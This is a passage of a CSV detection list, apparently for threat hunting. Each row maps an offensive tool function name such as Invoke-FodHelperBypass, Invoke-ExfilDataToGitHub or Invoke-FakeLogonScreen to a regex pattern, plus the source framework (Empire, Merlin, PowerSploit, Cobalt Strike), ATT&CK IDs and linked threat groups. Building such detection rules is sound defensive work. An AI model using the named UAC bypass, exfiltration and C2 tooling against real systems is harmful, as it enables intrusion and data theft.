T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EventVwrBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49022"
"*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49023"
"*Invoke-EventVwrBypass.ps1*",".{0,1000}Invoke\-EventVwrBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49024"
"*Invoke-ExcelMacroPivot*",".{0,1000}Invoke\-ExcelMacroPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49025"
"*Invoke-ExcelMacroPivot.ps1*",".{0,1000}Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49026"
"*Invoke-ExecuteMSBuild*",".{0,1000}Invoke\-ExecuteMSBuild.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ExecuteMSBuild.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49027"
"*Invoke-ExecuteMSBuild.ps1*",".{0,1000}Invoke\-ExecuteMSBuild\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49028"
"*Invoke-ExecutionCommand.json*",".{0,1000}Invoke\-ExecutionCommand\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49029"
"*Invoke-ExfilDataToGitHub*",".{0,1000}Invoke\-ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49030"
"*Invoke-ExploitableLeakedHandlesCheck*",".{0,1000}Invoke\-ExploitableLeakedHandlesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49031"
"*Invoke-Expression $obfuscated*",".{0,1000}Invoke\-Expression\s\$obfuscated.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","49032"
"*Invoke-Eyewitness*",".{0,1000}Invoke\-Eyewitness.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49034"
"*Invoke-FakeLogonScreen*",".{0,1000}Invoke\-FakeLogonScreen.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49035"
"*Invoke-Farmer*",".{0,1000}Invoke\-Farmer.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49036"
"*Invoke-FileC2Output*",".{0,1000}Invoke\-FileC2Output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49037"
"*Invoke-FileFinder -ShareList *",".{0,1000}Invoke\-FileFinder\s\-ShareList\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49038"
"*invokefilefinder*",".{0,1000}invokefilefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49039"
"*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49040"
"*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49041"
"*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49042"
"*Invoke-FileTransferWMImplant*",".{0,1000}Invoke\-FileTransferWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49043"
"*Invoke-FindDLLHijack*",".{0,1000}Invoke\-FindDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49044"
"*Invoke-FindPathHijack*",".{0,1000}Invoke\-FindPathHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49045"
"*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49046"
"*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49047"
"*Invoke-FodHelperBypass.ps1*",".{0,1000}Invoke\-FodHelperBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49048"
"*Invoke-ForgeUserAgent -Device *",".{0,1000}Invoke\-ForgeUserAgent\s\-Device\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49049"
